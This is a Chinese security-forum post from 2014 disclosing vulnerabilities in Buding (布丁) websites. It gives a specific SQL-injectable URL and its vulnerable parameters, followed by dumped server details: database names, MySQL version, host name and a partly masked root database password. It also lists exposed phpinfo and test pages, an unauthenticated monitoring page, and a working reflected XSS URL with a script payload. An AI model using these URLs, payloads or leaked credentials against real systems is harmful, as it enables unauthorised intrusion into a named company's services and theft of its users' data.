布丁漏洞包括SQL注射下载

来源:黑吧安全网 浏览:918次 时间:2014-05-22
做网站找雨过天晴工作室

布丁外卖SQL注入

http://waimai.2000tuan.com/waimai/view/get_waimai_by_shopid_and_typeid.php?shop_id=1&page=-1&city_id=31&type_id=4

type_id和shop_id参数存在注入

Host IP: 58.**.**6.23

Web Server: nginx/0.8.54

Powered-by: PHP/5.1.6

DB Server: MySQL

Resp. Time(avg): 143 ms

数据库: information_schema

b*****vice

c***ns

h***ay

int***ft

k*v

mysql

test

w***i

Current User: ****@localhost

SQL版本: 5.0.77-log

System User: ****@localhost

Host Name: c2.buding.cn

Installation dir: /usr/

数据库用户名&密码: root:0a9****2ca

服务器性能监控系统未授权访问

http://monitor206.shequan.com/

布丁phpinfo

http://log.2000tuan.com/app_log/index.php

http://waimai.2000tuan.com/index.php

http://log.2000tuan.com/index.php

http://shequan.com/info.php

======================================

布丁电影票XSS

http://jifenmovie.buding.cn/integral/msg.php?back_exit=true&itarget=reload&msg=%3Cscript%3Ealert('XSS')%3C/script%3E

======================================

布丁信息泄露

http://bz.shequan.com/test.php